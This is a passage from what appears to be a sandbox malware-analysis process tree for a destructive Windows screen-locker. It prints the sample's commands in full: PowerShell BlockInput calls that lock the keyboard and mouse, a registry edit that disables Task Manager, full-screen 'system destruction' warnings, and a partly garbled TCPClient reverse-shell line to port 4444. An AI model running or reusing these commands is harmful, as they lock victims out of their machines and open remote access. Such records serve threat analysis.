        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD88.tmp" "c:\Users\Admin\AppData\Local\Temp\o11kws0z\CSC99BB6541C52344E89394305E1CF7AB14.TMP"
        55⤵
        
        PID:4576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        53⤵
        
        PID:6880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        53⤵
        
        PID:8572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        51⤵
        
        PID:6872
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cewa0jdx\cewa0jdx.cmdline"
        52⤵
        
        PID:6452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        51⤵
        
        PID:6648
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ck3zd2ld\ck3zd2ld.cmdline"
        52⤵
        
        PID:6428
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES923.tmp" "c:\Users\Admin\AppData\Local\Temp\ck3zd2ld\CSC601494ABBE7641B8BC25E7BFBE3BC299.TMP"
        53⤵
        
        PID:6344
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        51⤵
        
        PID:5928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        51⤵
        
        PID:8100
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vv0o510w\vv0o510w.cmdline"
        52⤵
        
        PID:756
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBA.tmp" "c:\Users\Admin\AppData\Local\Temp\vv0o510w\CSC917DF1264DBA40E881F54838EF47FC90.TMP"
        53⤵
        
        PID:6520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        51⤵
        
        PID:7588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        51⤵
        
        PID:8564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        49⤵
        
        PID:5516
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0xcafldm\0xcafldm.cmdline"
        50⤵
        
        PID:6364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        49⤵
        
        PID:7344
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f3d5dmpi\f3d5dmpi.cmdline"
        50⤵
        
        PID:7808
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAFA.tmp" "c:\Users\Admin\AppData\Local\Temp\f3d5dmpi\CSC3874B6726F7E4AA4A8C23F8255D91CC.TMP"
        51⤵
        
        PID:5136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        49⤵
        
        PID:7104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        49⤵
        
        PID:2324
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwx3fx04\hwx3fx04.cmdline"
        50⤵
        
        PID:700
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AB.tmp" "c:\Users\Admin\AppData\Local\Temp\hwx3fx04\CSC14906BEFE8548BB9C32252BD6C7D38.TMP"
        51⤵
        
        PID:7796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        49⤵
        
        PID:7480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        49⤵
        
        PID:8612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        47⤵
        
        PID:6344
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sjbbvxg1\sjbbvxg1.cmdline"
        48⤵
        
        PID:6260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        47⤵
        
        PID:7496
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ls43l2oi\ls43l2oi.cmdline"
        48⤵
        
        PID:7956
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6C4.tmp" "c:\Users\Admin\AppData\Local\Temp\ls43l2oi\CSC5BB6EDD83A0C4CE482A83B81E85F9A18.TMP"
        49⤵
        
        PID:7852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        47⤵
        
        PID:7992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        47⤵
        
        PID:8160
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\awhciwro\awhciwro.cmdline"
        48⤵
        
        PID:6528
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE84.tmp" "c:\Users\Admin\AppData\Local\Temp\awhciwro\CSC988F3C81DC6045C1A86012616B686673.TMP"
        49⤵
        
        PID:7428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        47⤵
        
        PID:4644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        47⤵
        
        PID:6384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        47⤵
        
        PID:8548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        45⤵
        
        PID:6020
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jlrsipy0\jlrsipy0.cmdline"
        46⤵
        
        PID:3864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        45⤵
        
        PID:8048
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jmf25bj3\jmf25bj3.cmdline"
        46⤵
        
        PID:7716
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFBF.tmp" "c:\Users\Admin\AppData\Local\Temp\jmf25bj3\CSC1E2402A4FAF347F9ABABA926315B25B9.TMP"
        47⤵
        
        PID:7748
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        45⤵
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        45⤵
        
        PID:7676
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ho4suttw\ho4suttw.cmdline"
        46⤵
        
        PID:7624
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6F3.tmp" "c:\Users\Admin\AppData\Local\Temp\ho4suttw\CSC42E48A7FABE34AD48CB6A7B6AB8C5E1E.TMP"
        47⤵
        
        PID:7232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        45⤵
        
        PID:5928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        45⤵
        
        PID:8580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        43⤵
        
        PID:4620
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymcs1gse\ymcs1gse.cmdline"
        44⤵
        
        PID:5908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        43⤵
        
        PID:2400
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ndbmhn0a\ndbmhn0a.cmdline"
        44⤵
        
        PID:7756
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBB8.tmp" "c:\Users\Admin\AppData\Local\Temp\ndbmhn0a\CSCABE09F7AF0684F3A8C8762E91F0FF74.TMP"
        45⤵
        
        PID:7836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        43⤵
        
        PID:4260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        43⤵
        
        PID:7776
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zqrmuuim\zqrmuuim.cmdline"
        44⤵
        
        PID:6912
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF230.tmp" "c:\Users\Admin\AppData\Local\Temp\zqrmuuim\CSC241701D240494DDDAEC9A925DC7C409F.TMP"
        45⤵
        
        PID:7416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        43⤵
        
        PID:7376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        43⤵
        
        PID:6884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        41⤵
        
        PID:1916
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ba3wf4j\3ba3wf4j.cmdline"
        42⤵
        
        PID:6032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        41⤵
        
        PID:5464
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3m5wbif\w3m5wbif.cmdline"
        42⤵
        
        PID:7780
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBB9.tmp" "c:\Users\Admin\AppData\Local\Temp\w3m5wbif\CSC6B6DEE9AE1EF450598FA992BD05A3FE6.TMP"
        43⤵
        
        PID:7852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        41⤵
        
        PID:7560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        41⤵
        
        PID:7872
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ww2ayiaa\ww2ayiaa.cmdline"
        42⤵
        
        PID:5792
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF2BC.tmp" "c:\Users\Admin\AppData\Local\Temp\ww2ayiaa\CSCD8F0ED3484E74E7E9D18537B6DC6AD84.TMP"
        43⤵
        
        PID:5928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        41⤵
        
        PID:7436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        39⤵
        
        PID:5512
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4bu1kvam\4bu1kvam.cmdline"
        40⤵
        
        PID:5596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        39⤵
        
        PID:4556
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3diuleih\3diuleih.cmdline"
        40⤵
        
        PID:6012
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD8F.tmp" "c:\Users\Admin\AppData\Local\Temp\3diuleih\CSCEF0F4020911C4EE3A5547A84E48157C0.TMP"
        41⤵
        
        PID:5376
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        39⤵
        
        PID:4764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        39⤵
        
        PID:1136
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ggkh1wh3\ggkh1wh3.cmdline"
        40⤵
        
        PID:1664
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE474.tmp" "c:\Users\Admin\AppData\Local\Temp\ggkh1wh3\CSC6501DB021A7A4F8A92386BCE76FCEFBA.TMP"
        41⤵
        
        PID:660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        39⤵
        
        PID:2296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8128
        
